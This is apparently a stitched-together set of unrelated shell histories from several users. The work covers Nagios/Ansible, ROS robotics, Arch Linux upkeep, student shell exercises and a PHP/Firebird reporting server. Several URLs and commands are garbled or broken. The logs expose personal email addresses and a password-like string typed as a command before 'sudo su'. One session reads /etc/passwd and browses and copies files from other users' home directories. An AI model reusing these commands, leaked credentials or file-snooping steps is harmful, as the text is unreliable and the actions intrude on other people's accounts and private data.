+yum update python --latest +yum upgrade python +yum -y installs7.iuscommunity.org/ius-release.rpm +yum -y install python36u +python3.6 ping.py +nano ping.py +python3.6 ping.py +nano ping.py +python3.6 ping.py +nano ping.py +python3.6 ping.py +nano ping.py +python3.6 ping.py +ls +nano ping.py +ls +python3.6 ping.py +nano ping.py +python3.6 ping.py +ping +ping +ping-i 1 +ping -i 1 +ping -i 224 +ping -i 50 +ping -i 1 +ping +ping --help +ping -I lo +ping -I localhost +ping -I localhost google.com +ip a +ping -I eth0 google.com +ping --help +ping -m --help +ping -s --help +ping -T google.com +ping -T dd/mm/yyyy google.com +man ping +ping -T tsanadr google.com +ping -T tsanaddr google.com +ping tsanaddr google.com +man ping +ping -a +hostname +ping -a +ping -6 google.com +cat /etc/sysconfig/network-scripts/ifcfg-eth0 +passwd +adduser orange +passwd orange +passwd root +init 6 +service ansible status +ls /etc/ansible/ +ls +tree +cat defaults/main.yml +nano defaults/main.yml +ll +cat handlers/main.yml +cat meta/main.yml +cat tasks/main.yml +ls +ls +cat tasks/main.yml +ls +cat tasks/nagios-packages +cat tasks/packages.yml +cat tasks/rhel-packages.yml +ls tasks/ +cat tasks/server-rhel.yml +ls +ls +ls +ls ansible_nagios/ +ls +ls +ls test1/ +ls test1/tasks/ +ls test1/vars/ +cat test1/vars/ +cat test1/vars/default-vars.yml +ls +cat nagios/server.nagios/meta/main.yml +ls +ls test1/ +ls test1/tasks/rhel-packages.yml +cat test1/tasks/rhel-packages.yml +ls +ls +tree +cat tasks/main.yml +cat tasks/nagios-packages +tree +cat tasks/packages.yml +tree +cat tasks/rhel-packages.yml +tree +cat tasks/server-rhel.yml +ls +ls .. +ls ../nagios/ +ls ../nagios/nrpe.client/ +cat ../nagios/nrpe.client/Jenkinsfile +cat ../nagios/nrpe.client/templates/local-nrpe.cfg.j2 +ls +nano README +ll +ls +ls +mv test1 Nagios-Centos +ls +git init +git add . +git commit -m "Nag commit 1 " +git remote add origins-Centos.git +git push origin master +ls +ping +ping +ansible-playbook -m ping all +ls +ls +ansible-playbook -m ping all +cat ansible.yml +ansible -m ping all +cat hosts +ping +ssh +ansible -m ping all +nano hosts +ansible -m ping all +ls +cat test1.yml +ls +ansible -m ping webserver +cat hosts +ansible -m ping nrpe +ssh-copy-id +ssh +ansible -m ping nrpe +ansible -m ping all +nano hosts +ls +ll +dd +man dd +rm ~/server/.fip-destination +set -o vi +cat ~/server/.fip-destination +ls -ltr +vi fipserver.log +pwd +mkdir protected +touch protected/pre_commit.sh +touch protected/post_commit.sh +vi protected/p* +tail -f fipserver.log +chmod +x ~/server/protected/* +tail -f fipserver.log +l +./startup.sh +tail -f catalina.out +bg +./shutdown.sh +./startup.sh +ps +ps -ef +ls -la +stop +cat .bashrc +cat .profile +. serverkit/tooltwist_rc +mkdir bin +touch bin/setenv.sh +. serverkit/tooltwist_rc +stop +ps -ef +start +ls -l +tar xvf /tmp/,sc +ls -l +man touch +ls -l +log +. serverkit/tooltwist_rc +log +bg +start +pwd +export TOOLTWIST_HOME=`pwd` +start +vi ~/server/tomcat/bin/startup.sh +vi ~/server/tomcat/bin/catalina.sh +export JAVA_OPTS=-DTOOLTWIST_HOME=`pwd` +echo $JAVA_OPTS +stop +start +stop +l +vi * +start +stop +grep junk-cli-1 * +vi logback.xml +start +vi tooltwist.xml +export JAVA_OPTS="-DTOOLTWIST_HOME=/home/tooltwist/site-conf -Djava.security.egd=file:/dev/./urandom" +start +stop +ps +ps -ef +kill -9 734 +ps -ef +start +l .. +tail -f ../tooltwist.log +bg +grep productionPublishDir * +stop +vi wbd.conf +start +convert +which convert +vi wbd.conf +stop +start +pwd +ls -l +l bin/ +rm tooltwist.log +pwd +tar cvf /tmp/,sc2 site-conf/ +ls +ls -lh +pwd +ls +pwd +ls /etc +ls +sudo apt install libssl-dev bison flex +sudo apt install qt5-default pkg-config +clear +sudo apt install libglade2-dev +ls +exit +ls +sudo apt install vim +clear +ant les règles +mkdir +mkdir dir +mkdir -pdirclear +clear +sudo apt install git gitk git-pendaleyexo@gmail.com +sudo apt install git gitk git-email +git config --global user.name penda +git config --user.email pendaleyexo@gmail.com +git config --global user.name +git config --global user.email +git config --global user.email pendaleyexo@gmail.com +git config --global user.email pendaleyexo@gmail.co +git config --global user.email pendaleyexo@gmail.com +git config --global user.email +mkdir partie2 +vi +passwd +exit +sudo shutdown -h now +ls +sudo apt-get update +sudo ntpdate pool.ntp.org +sudo apt-get install build-essential +locale +locale -a +export LANGUAGE=en_US.utf8 +locale +export LC_all=en_US.utf8 +locale +export LC_ALL=en_US.utf8 +locale +clear +locale +clear +locale +locale -a +sudo dkpg update locale +sudo dpkg-update locale +sudo dpkg update locale +sudo nano /etc/environment +sudo apt-get update +sudo apt-get install python-dev +sudo apt-get install python-setuptools +python +gcc -h +gcc --h +sudo apt-get install python-pip python-smbus +sudo apt-get install pyserial +sudo pip install pyserial +python +sudo apt-get update +2. sudo sh -c 'echo "debs.ros.org/ros/ubuntu trusty main" > /etc/apt/sources.list.d/ros-latest.list' +5. EET: wgetsercontent.com/ros/rosdistro/master/ros.key -O - | sudo apt-key add - +wgetsercontent.com/ros/rosdistro/master/ros.key -O - | sudo apt-key add - +sudo sh -c 'echo "debs.ros.org/ros/ubuntu trusty main" > /etc/apt/sources.list.d/ros-latest.list' +sudo apt-get update +sudo apt-get install ros-indigo-ros-base +rosdep +sudo apt-get install python-rosinstall +dh +df +roscore +sudo reboot +top +sudo shutdown -h now +export | grep ROS +rosws init ~/ros_workspace /opt/ros/indigo +sudo nano .bashrc +ls +ls +mkdir drone +rosws set drone +ls +ls +ls +source setup.bash +echo $ROS_PACKAGE_PATH +roscreate-pkg aristarko std_msgs rospy roscpp +ls +sudo rm -rf aristarko +ls +roscreate-pkg aristarko std_msgs rospy roscpp +ls +ls +roscd +ls +ls +ls +make +ld +ls +roscore +roscd +ls +python talker.py +ls +roscd +ls +python talker.py +ls +make +ls +./talker +roscd +ls +ls +python vn200.py +ls +ls +ls +ls +mkdir -p ~/catkin_ws/src +ls +ls +pwd +catkin_init_workspace +ls +ls +catkin_make +ls +ls +source setup.bash +echo $ROS_PACKAGE_PATH +roscd +ls +ls +catkin_create_pkg prueba std_msgs rospy roscpp +ls +ls +ls +ls +catkin_make +ls +build +ls +ls +ls +ls +ls +catkin_make +df +ls +rm -rf vectornav-master/ +ls +git clone +ls +catkin_make +ls +ls +ls +ls +ls +ls +python vn200.py +sudo shutdown -h now +roscore +roscd +ls +ls +python vn200.py +ls +ls +ls +ls +make +ls +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +make +./vn200_linux_async_easy +top +sudo shutdown -h now +roscd +ls +sudo chmod +x listener.py +ls +python listener.py +sudo shutdown -h now +rostopic list +rostopic echo publico:ins +rostopic echo publico_ins +top +grep . -r /sys/firmware/acpi/interrupts/ +rosc +roscd +ls +python listener.py +grep . -r /sys/firmware/acpi/interrupts/ +ls +ls +roscd +ls +python listener.py +rostopic echo publico_ins +python listener.py +rostopic echo publico_ins +python listener.py +roscd +ls +python listener.py +ls +sudo chmod 666 talker +sudo chmod 666 radio.py +ls +sudo chmod 666 radio.pyls +ls +python radio.py +rostopic echo publico_ins +python radio.py +rostopic list +python radio.py +rostopic list +rostopic echo publico_insInfo +python radio.py +rosnode list +ls +python start_robot +python start_robot.py +clear +python start_robot.py +ls +ls +ls +ls +python start_robot.py +python start_robot.py +ls +ls +roscd +ls +ls +python radio.py +rosnode list +top +sudo reboot +sudo nano .bashrc +roslaunch aristarko robot.launch +sudo shutdown -h now +top +roslaunch aristarko robot.launch +top +roslaunch aristarko robot.launch +top +touch name.cpp +git init +git config --global user.email "m.tsekhmistro@gmail.com" +rm html/ -rf +make +cp -r ${RMTOO_BASE_PATH}/rmtoo/contrib/template_project MyProject +RMTOO_BASE_PATH=/usr/share +cp -r ${RMTOO_BASE_PATH}/rmtoo/contrib/template_project MyProject +source ./setenv.sh ${RMTOO_BASE_PATH}/rmtoo +make +rm MyNewProject/ +rm MyNewProject/ -rf +cp -r ${RMTOO_BASE_PATH}/rmtoo/contrib/template_project MyNewProject +rm python +sudo rm python +ls +grep python **/* +grep python *.* +grep python * +grep python */* +grep python */*.* +ls +grep --help +grep python -r *.* +grep -i python *.* +grep -i python -r *.* +vim setenv.sh +source ./setenv.sh ${RMTOO_BASE_PATH}/rmtoo +ls +vim Makefile +make +vim Makefile +make +ls +vim Config.json +ls +ls +vim setenv.sh +ls +ls +ls +grep python *.* +vim setup.py +make +rm MyNewProject/ +rm MyNewProject/ -rf +source ./setenv.sh ${RMTOO_BASE_PATH}/rmtoo +cp -r ${RMTOO_BASE_PATH}/rmtoo/contrib/template_project MyNewProject +make +ld +ls +vim Makefile +ls +make +ls +ls +grep -r python *.* +ls +grep python *.* +grep python * +vim rmtoo +vim rmtoo-configuration-convert +grep python * +vim rmtoo-normalize-dependencies +grep python * +vim rmtoo-pricing-graph +grep python * +ls +make +sudo shutdown -h now +sudo shutdown -h now +sudo pacman -Syu +ls +ls +ls +vim requirements.tex +ls +ls +ls +ls +vim WhatsAbout.tic +ls +ls +ls +ls +startx +ls +sudo shutdown -h now +sudo pacman -Syu +ls +ls +ls +ls -l | grep python2 +ls | grep python2 +ls | grep LaTeX +ls | grep LaT +ls | grep TeX +ls | grep tex +ls | grep texlive +sudo pacman -S texlive-most +ls +ls +ls +vim setenv.sh +ls +vim Makefile +ls +ls +ls +vim requirements.tex +ls +ls +ls +vim ReqsDocument.tic +ls +ls +ls +ls +vim req-graph1.dot +ls +vim stats_sprint_burndown.csv +ls +vim stats_reqs_cnt.csv +ls +vim stats_reqs_cnt.eps +ls +vim requirements.log +ls +ls +vim Config.json +ls +ls +ls +sudo shutdown -h now +sudo pacman -Syu +yaourt +exit +reboot +sudo shutdown +sudo shutdown -h now +sudo pacman -Syu +sudo pacman awsom +sudo shutdown -h now +sudo shutdown -h now +startx +exit +sudo pacman -Syu +sudo shutdown -h now +startx +sudo pacman -Syu +sudo shutdown -h now +sudo shatdown -h now +sudo -s +su +su +startx +ls +ls +ls +vim Config.json +ls +rm MyProject/ -rf +rm MyNewProject/ -rf +ls +mkdir Projects +git +git clone ssh://mario@mabit.de/srv/git/HomeOrder.git +sudo pacman -S openssl +sudo pacman -S openssh +git clone ssh://mario@mabit.de/srv/git/HomeOrder.git +git clone ssh://mario@mabit.de/srv/git/HomeOrder.git +git clone ssh://mario@mabit.de/srv/git/HomeOrder.git +git clone ssh://mario@mabit.de/srv/git/HomeOrder.git +ssh mario@mabit.de +git clone ssh://mario@mabit.de/srv/git/homeOrder.git +ls +ls +vim config +ls +vim config +ls +ls -a +ls -ha +ls -la +mkdir homeOrder +cp ~/Projects/homeOrder/config ./homeOrder/config +ls +ls +python ./da.py +sudo pacman -Syu python +sudo pacman -Syu python +sudo pacman -Syu python +sudo pacman -S python +python ./da.py +vim da.py +startx +sudo pacman -Syu +startx +sudo pacman -Syu +sudo pacman -R ttf-dejavu +sudo pacman -Rf ttf-dejavu +sudo pacman -R defavu +sudo pacman -R ttf-defavu +sudo pacman -R dejavu +sudo pacman -R ttf-defavu +sudo pacman -R ttf-dejavu +rm /etc/fonts/conf.d/20-unhint-small-dejavu-sans-mono.conf +sudo rm /etc/fonts/conf.d/20-unhint-small-dejavu-sans-mono.conf +sudo rm /etc/fonts/conf.d/20-unhint-small-dejavu-sans.conf +sudo rm /etc/fonts/conf.d/20-unhint-small-dejavu-serif.conf +sudo rm /etc/fonts/conf.d/57-dejavu-sans-mono.conf +sudo rm /etc/fonts/conf.d/57-dejavu-sans.conf +sudo rm /etc/fonts/conf.d/57-dejavu-serif.conf +sudo pacman -Syu +sudo reboot +yaourt numix +pacman -S numix-frost +sudo pacman -S numix-frost +ls +exit +ls +ls +ls +git pull +c d.. +vim .bashrc +sudo find / -iname git-promp* +cp /usr/share/git/completion/git-prompt.sh ~/.git-prompt.sh +bash +vim .bashrc +bash +ls +ls +ls +sudo pacman -S oracle-netbeans +sudo pacman -Q oracle +python +exit +startx +yaourt +pacman -Q netbeans +sudo pacman -S netbeans +startx +vim /home/mario/.viminfo +ls +ls -l +ls -a +vim .gitconfig +vim .git-prompt.sh +sudo pacman -Syu +sudo pacman -Syu +sudo pacman -Syyu +sudo pacman-db-upgrade +sudo pacman -Sy archlinux-keyring +sudo pacman -Syu +ls +ls -lh +ls -la +sudo .viminfo +vim .viminfo +vim --help +vim --version +sudo pacman -S cmap +sudo pacman -S ctags +sudo pacman -S ctags +sudo pacman -Syu +vim todo +ls +vim todo +vim todo +vim todo +git add - +git add . +git commit +git config --global user.email "MarioBittner@gmx.de" +git config --global user.name "Mario Bittner" +git commit +git config --global core.editor "vim" +git commit +git commit +git tags +git tag +git tags --help +git tag --help +git tag -l +git tag --help +git tag 0.1 +git tag -l +git branches +git branch +git branch --help +git branch --list +git branch --help +git branch --all +git branch MultiFolder +git checkout MultiFolder +git add . +git status +git commit +git branch --all +git push +git push origin MultiFolder +git pull +git fetch +git pull MultiFolder +git pull +git pull origin/MultiFolder MultiFolder +git repository +git branch -a +git pull +git fetch +git remote +git remote -v +git remote show origin +git pull MultiFolder +git pull +git branch --set-upstream-to=origin/MultiFolder MultiFolder +git pull +git remote show origin +git remote show origin +ls +ls +vim getConfig.py +vim getConfig.py +ls +vim config +vim config +vim config +ls +ls +ls +vim config +ls +python da.py +python da.py +python da.py +python da.py +python da.py +python da.py +python da.py +python da.py +python da.py +python da.py +python da.py +python da.py +python da.py +python da.py +python da.py +python da.py +python da.py +python da.py +python da.py +python da.py +python da.py +python da.py +python da.py +python da.py +ls +startx +ls +vim da.py +vim da.py +vim da.py +vim da.py +vim da.py +vim da.py +vim da.py +vim da.py +vim da.py +vim da.py +vim da.py +vim da.py +vim da.py +vim da.py +vim da.py +vim da.py +vim da.py +vim da.py +vim da.py +vim da.py +vim da.py +bg +vg +fg +vim da.py +vim da.py +vim da.py +vim da.py +vim da.py +vim da.py +vim da.py +vim da.py +vim da.py config todo getConfig.py +ls +exit +exit +exit +exit +tmux --help +vim +screen +exit +exit +exit +htop +sudo pacman -S htop +htop +w +exit +pwd +ls +ls -lt +pwd +ls -lt +exit +vi cat.txt +pwd +ls -lt +pwd +vi trabalho.sh +cat trabalho.sh |grep an +sh trabalho.sh +clear +ls -tl +ls -lt *.sh +sh entrega.sh +ls -lt +diff entrega.sh trabalho.sh +rm entrega.sh +cat teste.txt +rm teste.txt +grep andreia * +rm rev.sh wc.sh +grep andreia * +pwd +clear +sh trabalho.sh +vi trabalho.sh +sh trabalho.sh +exit +pwd +ls -lt +sh trabalho.sh +vi trabalho.sh +sh trabalho.sh +vi trabalho.sh +sh trabalho.sh +clear +sh trabalho.sh +clear +sh trabalho.sh +vim trabalho.sh +ls -lt +cat sedtexto1.txt +sh trabalho.sh +pwd +cut -d : -f 1 /etc/passwd +cut -d : -f 1 /etc/passwd > a +v a +vi a +cut -c : -f 1 /etc/passwd > a +cut -n : -f 1 /etc/passwd > a +cut -b : -f 1 /etc/passwd > a +cut -b /etc/passwd > a +cut -b : /etc/passwd +cut -d : -f 1 /etc/passwd +cut -c : -f 1 /etc/passwd +cut -c : -c 1 /etc/passwd +cut -c 1 /etc/passwd +cut -b 1 /etc/passwd +cut -f 1 /etc/passwd +cut -d 1 /etc/passwd +cut -s 1 /etc/passwd +pwd +cut -b 1 /etc/passwd +cut -b 2 /etc/passwd +cut -b 6 /etc/passwd +cut -b /etc/passwd +cut -b 4 /etc/passwd +cut -c 4 /etc/passwd +cut -f /etc/passwd +cut -f 1 /etc/passwd +cut -f 2 /etc/passwd +cut -f 000 /etc/passwd +cut -f 888 /etc/passwd +cut -f 777 /etc/passwd +cut -f 888 /etc/passwdpwd +pwd +mkdir trabalho +mv *.txt *sh trabalho +ls -lt +rm a +cat +cat q +cat 1 +rm 1 +ls -lt +owd +pwd +vi trabalho +pwd +ls -tl +vo trabalho.sh +vi trabalho.sh +vim trabalho.sh +vi trabalho.sh +sh trabalho +cat trabalho +sh trabalho.sh +vi trabalho +rm trabalho +ls +ls -lt +ls -lt trabalho* +vi trabalho.sh +sh trabalho.sh +ls numero* +cat numeros.txt +vi trabalho, +vi trabalho.sh +sh trabalho.sh +cat numero. +cat numeros.txt +sort numeros.txt +vi numeros.txt +cat sort.txt +vi numeros.txt +sort numeros.txt +vi trabalho.sh +sh trabalho.sh +vi trabalho.sh +sh trabalho +sh trabalho.sh +vi trabalho.sh +sh trabalho.sh +vi trabalho.sh +sh trabalho.sh +cat grep.txt +grep -h /etc/passwd +vi trabalho.sh +sh trabalho.sh +seq -s 3 /etc/passwd +seq -s /etc/passwd +seq --help +seg -f numeros.txt +seq -f numeros.txt +seq -f 3 numeros.txt +seq -f 1 numeros.txt +sh trabalho.sh +ls -lt +ls -ltr +daqte +date +top +df -h +pwd +dmesg +/sbin/dmesg +ifconfig +/sbin/ifconfig +df -hs +df -s +df -h +ls -lt /home/adrianaredes +cat /etc/passwdo |grep hele +cat /etc/passwd |grep hele +ls -lt /home/helenluciany +ls -lt /home/helenluciany/helen +ls -lt /home/helenluciany/teste +ls -lt /home/helenluciany/lista +cat /home/helenluciany/lista +cat /home/helenluciany/case5 +pwd +mkdir teste +cat /home/helenluciany/case5 > caso5 +ls -t /home/helenluciany/ +ls /home/helenluciany/ +ls -lt /home/helenluciany/ +cat /home/helenluciany/case3 > caso3 +cat /home/helenluciany/case4 > caso4 +ls -lt /home/helenluciany/backup +clear +exit +cat /home/helenluciany/case3 +cat /home/helenluciany/simnao +cat /home/helenluciany/backup/arquivobin.backup +ls -lt /home/helenluciany/ +cat /home/helenluciany/helenlucianycechinelmcedit +exit +cat /etc/passwod > a +cat /etc/passwd > a +cat a +grep hele a +cat /home/helenluciany/ +ls /home/helenluciany +ls -lt /home/helenluciany +ls -lt /home/helenluciany/helen +ls -lt /home/helenluciany/original +ls /home/helenluciany/bin +ls -lt /home/helenluciany/bin +cat /home/helenluciany/bin/primeiro +cat a +ls -lt /home/luana +cat /home/luana/scriptrabalho.save +ls -lt /home/* +ls /home +cat a +ls -lt /home/Maiquel +cat /home/Maiquel/simnao.sh +ls -lt /home/lohn2 +ls -lt /home/lohn2/aula1 +cat /home/lohn2/aula1/teste +cat /home/lohn +cat /home/lohn1 +ls /home/lohn2 +ls -lt /home/lohn2 +ls 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2') | grep -vFf - <(wpa_cli scan_results | awk {'print $5'} | awk 'NR > 2') +) +echo $tmp +tmp=$(wpa_cli scan_result | awk {'print $5'} | awk 'NR > 2' | grep -oFf <(wpa_cli list_networks | awk {'print $2'} | awk 'NR > 2') | grep -vFf - <(wpa_cli scan_results | awk {'print $5'} | awk 'NR > 2') +) +echo $tmp +available=$(wpa_cli list_networks) | awk 'NR > 2 {print $5}' +echo $available +available=$(wpa_cli list_networks) | awk 'NR > 2'| awk {'print $5'} +echo $available +available=$(wpa_cli list_networks) | awk 'NR > 2'| awk {'print $5'} +exit +wpa_cli scan_results| grep -f <(echo "LAN1-Baltic-Bay") | awk{'print $4'} +wpa_cli scan_results| grep -f <(echo "LAN1-Baltic-Bay") | awk {'print $4'} +enc=$(wpa_cli scan_results| grep -f <(echo "LAN1-Baltic-Bay") | awk {'print $4'}) +echo enc +echo $enc +"$(echo $enc | grep -o "PSK")" == *"EAP"* +if [["$(echo $enc | grep -o "PSK")" == *"EAP"* ]]; echo "TEST"; fi +if [["$(echo $enc | grep -o "PSK")" == *"EAP"* ]]; echo "TEST"; fi; +if [["$(echo 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add . +git status +git push +git push --set-upstream origin gh-pages +git add . +git push origin gh-pages +git add . +git push origin gh-pages +git status +git commit -m'modify' +git push +git add . +git commit +git add . +git commit -m 'change to UTF-8' +git push +git add . +git status +git commit -'modify default' +git push +git add . +git add . +git status +git commit -m 'add cv' +git push +git pull +git pull -m 'delete spaces' +git pull +git add . +git commit -m 'cv' +git push +git add . +git commit -m 'add English CV' +git push +git pull +git push +git pull +git commit -m'change CV' +git push +git pull +git pull +git commit +git add . +git commit +git pull +git add . +git commit -m 'smg' +git pull +git push +git pull +git add . +git merge +git commit -m'smg' +git merge +git push +git add . +git status +git commit -m 'unmerge' +git oush +git push +git status +git push +git pull +git remote add originseStudy.git +git push -u origin master +git push -u origin master +git init +git remote add originseStudy.git +git push -u origin master +git push -u origin master +git add. +git add . +git status +git commit -m'case for BilibiliCourse' +git push +git push --set-upstram origin master +git push +git add README.md +git remote add originseStudy.git +git push -u origin master +git reflog +git pull +git pull +git pullshen.github.io.git +git pullshen.github.io.git +. +C +C:/ +C/: +C +C: +git pullshen.github.io.git +--allow-unrelated-histories +git pull github.com/YuweiShen/yuweishen.github.io.git--allow-unrelated-histories +git pullshen.github.io.git--allow-unrelated-histories +git pullshen.github.io.git --allow-unrelated-histories +sudo -i +su +sudo su +php -v +mysql -u root -p +dir +dir +dir +dir +ifconfig +sudo nano /etc/network/interfaces +ifconfig +reboot +sudo reboot +sudo apt-get update +sudo apt-get upgrade +sudo add-apt-repository ppa:mapopa +sudo apt-get update +sudo apt-get install firebird2.5-superclassic +ifconfig +ping www.google.com +sudo dpkg-reconfigure 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+sudo vi fstab +sudo mount -a +sudo reboot +isql-fb +sudo isql-fb +dir +dir +vi ReportController.php +sudo isql-fb +sudo vi SmartMenuSidebar.php +vi ReportController.php +vi ControllerBase.php +sudo vi SourceModeler.php +vi SourceModeler.php +dir +sudo cp -r app/ /home/silar_copy +dir +dir +sudo mv /home/silar_copy/ /home/group/silar_copy +dir +dir +dir +dir +dir +vi ReportController.php +vi SourceModeler.php +vi ReportController.php +vi debug.log +vi ReportController.php +vi SourceModeler.php +vi ReportController.php +vi ControllerBase.php +vi ReportController.php +dir +vi error.log +sudo vi error.log +vi error.log +vi SalesController.php +vi SalesController.php +CD / +dir +vi ReportController.php +vi ControllerBase.php +vi SourceModeler.php +vi ReportController.php +vi ReportController.php +sudo vi ReportController.php +vi FirebirdSQLCreator.php +dir +ls -a +rm .FirebirdSQLCreator.php.swp +sudo vi FirebirdSQLCreator.php +vi ReportController.php +vi ControllerBase.php +git remote +sudo git remote add silarsolutionsCluster/silar +dir +ls -a +vi ControllerBase.php +vi FilterController.php +dir /home/silar/app/databases/6/ +vi FilterController.php +vi FirebirdConnector.php +vi FilterController.php +vi FirebirdConnector.php +vi ReportController.php +vi ControllerBase.php +vi FirebirdConnector.php +vi FilterController.php +vi FirebirdConnector.php +vi debug.log +php -v +dir -ls +dir -ls +dir -ls +dir -ls +dir -ls +dir -ls +dir -ls +dir -ls +chmod -R 777 databases/ +sudo chmod -R 777 databases/ +vi ReportController.php +vi ControllerBase.php +vi ReportController.php +vi ControllerBase.php +vi /home/silar/app/config/configuration.ini +vi ControllerBase.php +vi /home/silar/public/index.php +vi /home/silar/app/misc/SourceModeler.php +vi index.php +vi SalesController.php +rm .SalesController.php.swp +vi SalesController.php +vi ControllerBase.php +isql-fb +sudo isql-fb +sql-fb +sudo isql-fb +isql-fb +sudo isql-fb +dir /home/dropbox/bd6/ +cp /home/dropbox/bd6/ZOOMARCANES.FDB /home/silar/app/databases/6/6.FDB +vi ControllerBase.php +sudo isql-fb +vi ControllerBase.php +cp /home/group/.git/ /home/silar/.git +sudo cp -r /home/group/.git/ /home/silar/.git +dir +ls -a +git remote +git remote -v +git push origin master +git commit #cambios en caliente +sudo git commit #cambios en caliente +git config --global user.email "soporte@solutionscluster.net" +git config --global user.name "solutionsCluster" +sudo git commit #cambios en caliente +sudo git commit-a #cambios en caliente +sudo git commit -a #cambios en caliente +sudo git commit -a # cambios en caliente +sudo git commit -a 'cambios en caliente' +sudo git commit -a # 'cambios en caliente' +sudo git commit -a "cambios en caliente" +sudo git commit "cambios en caliente" +sudo git commit +sudo git commit -a +sudo git commit --help +sudo git commit -a -m cambios en caliente +sudo git commit -m cambios en caliente +sudo git commit -m 'cambios en caliente' +sudo git commit -a -m 'cambios en caliente' +git push origin master +git push --help +git push -f +git push -f origin master +sudo git push -f origin master +git add .gitignore +sudo git add .gitignore +dir +ls -a +vi .gitconfig +git push origin master +sudo git push origin master +git status +git add -a +git add +sudo git add +sudo git add -A +git status +git checkout -- app/databases/1/1.FDB +sudo git checkout -- app/databases/1/1.FDB +sudo git checkout -- app/databases/6/6.FDB +git status +sudo git push origin master +isql-fb +sudo isql-fb +vi debug.log +vi error.log +dir +mv error.log error.log.2 +sudo mv error.log error.log.2 +dir -ls +sudo vi error.log +dir +dir -ls +sudo vi error.log +sudo chgrp adm error.log +dir -ls +sudo vi error.log +mv error.log error.log.11 +sudo mv error.log error.log.11 +sudo mv error.log.2 error.log +sudo vi error.log +dir +dir -l +dir +dir +sudo crontab -e +crontab -e +dir +dir +crontab -e +dir +sudo cp ZOOMARCANES.FDB /home/silar/app/databases/6/6.FDB +vi error.log +vi debug.log +rm .debug.log.swp +vi debug.log +dir -l +dir -l +sudo chmod -R 777 6/ +dir -l +vi debug.log +dir +dir +cp RPT-002.volt.php RT-maquila.volt.php +dir +cp RPT-002.volt RT-maquila.volt +dir +nano FirebirdSQLCreator.php +dir +dir +vi ReportController.php +dir +rm RT-maquila.volt +dir +rm RT-maquila.volt.php +dir +vi FirebirdSQLCreator.php +nano FirebirdSQLCreator.php +dir +cp RPT-002.volt RPT-003.volt +dir +vi showreport.volt +dir +dir +vi report-partial.volt +nano report-partial.volt +dir +vi RPT-003.volt +dir +dir +vi highcharts.js +nano highcharts.js +dir +vi RPT-003.volt +sudo vi RPT-003.volt +dir -i +ls -a +rm .RPT-003.volt.sw +rm .RPT-003.volt.swn +rm .RPT-003.volt.swo +rm .RPT-003.volt.swp +ls -a +sudo vi RPT-003.volt +ls -a +rm .RPT-003.volt.swp +sudo vi RPT-003.volt +vi highcharts.js +dir +vi RPT-003.volt +dir +vi RPT-003.volt +vi RPT-003.volt.php +vi RPT-003.volt +vi RPT-003.volt.php +dir +vi FirebirdSQLCreator.php +dir +vi highcharts.js +vi FirebirdSQLCreator.php +vi SourceModeler.php +dir +vi highcharts.js +dir +vi highcharts.js +vi FirebirdSQLCreator.php +vi ReportController.php +vi ReportController.php +vi FirebirdSQLCreator.php +dir +dir +phalcon +php -v +dir -ls +dir -ls +chmod 777 13.FDB +sudo su +suso s +suso su +S1l4r2016$ +sudo su +sudo su +dir +dir +dir +nano RS-008.volt +sudo su +sudo su +sudo su +w3m localhost/alertas +sudo su +dir +mv prueba.pdf /home/dropbox/prueba.pdf +sudo su +dir +dir +vi error.log +w3m localhost/alertas +cp /var/www/html/alertas/reportes/prueba1.pdf /home/dropbox/ +sudo su +sudo su +sudo su +w3m localhost/alertas +sudo su +S1l4r2016$ +sudo su +w3m localhost/alertas +vi error.log +w3m localhost/alertas +vi error.log +w3m localhost/alertas +vi error.log +w3m localhost/alertas +vi error.log +w3m localhost/alertas +vi error.log +w3m localhost/alertas +dir /home/silar/app/databases/12/ +rm /home/silar/app/databases/12/12.FDB +dir /home/silar/app/databases/12/ +cp /home/dropbox/12.FDB /home/silar/app/databases/12/12.FDB +w3m localhost/alertas +vi error.log +w3m localhost/alertas +vi error.log +w3m localhost/alertas +vi error.log +w3m localhost/alertas +vi error.log +sudo su +sudo su +w3m localhost/alertas +sudo su +vi /var/log/apache2/error.log +w3m localhost/alertas +vi /var/log/apache2/error.log +w3m localhost/alertas +vi /var/log/apache2/error.log +w3m localhost/alertas +sudo su +w3m localhost/alertas +sudo su +sudo su +w3m localhost/alertas +sudo su +w3m localhost/alertas +sudo su +sudo su +w3m localhost/alertas +sudo su +w3m localhost/alertas +sudo su +sudo su +sudo su +sudo su +sudo su +sudo su +sudo su +sudo su +sudo su +sudo su +sudo us +sudo su +sudo su +sudo su +dir /home/dropbox/ +dir +sudo +sudo su +sudo su +sudo su +mail +mail --help +mail -s "mensaje de prueba" -a /var/www/html/alertas/reportes/repexcel.xls soporte@solutionscluster.net +mail -A /var/www/html/alertas/reportes/repexcel.xls soporte@solutionscluster.net +mail -A /var/www/html/alertas/reportes/repexcel.xls ricardo.buitrago@solutionscluster.net +php5 index.php +php5 /var/www/html/alertas/index.php +clear +php5 /var/www/html/alertas/index.php +w3m localhost/alertas +php5 /var/www/html/alertas/index.php +clear +php5 /var/www/html/alertas/index.php +clear +uname +uname -m +uname -m-v +uname -v +uname --help +uname -a +apt-get install nodejs +apt-get install npm +add-apt-repository ppa:chris-lea/node.js +sudo su +vi /var/www/html/alertas/index1.php +sudo su +sudo su +kill w3m +vi /var/www/html/alertas/index.php +php5 /var/www/html/alertas/index.php +vi /var/www/html/alertas/index.php +sudo su +vi /var/log/apache2/error.log +w3m localhost/alertas +vi /home/tareas/alertas.sh +vi /home/tareas/tarea_copia_bd.sh +cp tarea_copia_bd.sh copia_maquila.sh +sudo su +sudo su +sudo su +sudi +sudo su +sudo su +sudo sy +sudo su +exit +sudo su +exit +sudo su +sudo su +mail -s "prueba remitente" ozkrpb@hotmail.com +vi ssmtp.conf +dir +vi hostname +vi host.conf +vo hosts +vi hosts +dir +vi sendmail.conf +vi sendmail.mc +vi mailname +dir -l +dir +vi mailname +sudo su +sudo su +sudo su +sudo su +ovs-ofctl dump-flows +ifconfig +sudo ifconfig +sudo ovs-vsctl --help +sudo ifconfig +sudo ovs-vsctl add-br br_ovs +sudo ovs-ofctl show br_ovs +sudo ovs-vsctl add-port br_ovs ethX-facing-h1 +ifconfig +sudo ovs-vsctl 